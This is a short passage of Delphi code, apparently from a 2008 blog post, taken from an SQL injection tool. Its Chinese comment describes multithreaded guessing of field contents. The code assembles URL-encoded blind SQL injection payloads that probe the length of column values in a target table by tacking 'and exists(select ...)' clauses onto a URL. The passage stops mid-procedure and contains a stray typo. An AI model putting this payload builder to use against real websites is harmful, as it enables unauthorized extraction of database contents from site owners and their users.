分类:
2008-10-15 13:43:47
procedure TMainForm.GuessContProc(ListInt: integer); {SQL注入 - 多线程猜解字段内容}
function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;
begin
Result := Url + ’%20and%20exists(select%20*%20from%20’ + TableName +’%20where%20len(’ + FieldName + ’)’ + LevelStr + IntToStr(Len) + ’%20and%20id=(Select%20max(id)%20From%20’ + TableName +’%20where%20id%20in%20(select%20top%20’ + TOPStr + ’%20id%20from%20’ + TableName + ’%20Order%20by%20id)))’
end;
var
TableName: string;
FieldName, S: string;
ContentInt: integer;
i, Len, LengthInt, N: integer;
GridCount: integer;
Colu: TColumn;
FlagBool: boolean;
begin
Len := 0;I
LengthInt := 0;
FlagBool := True;
TableName := TableNameLst.Items[TableNameLst.Itemindex];
FieldName := Memo2.Lines[ListInt];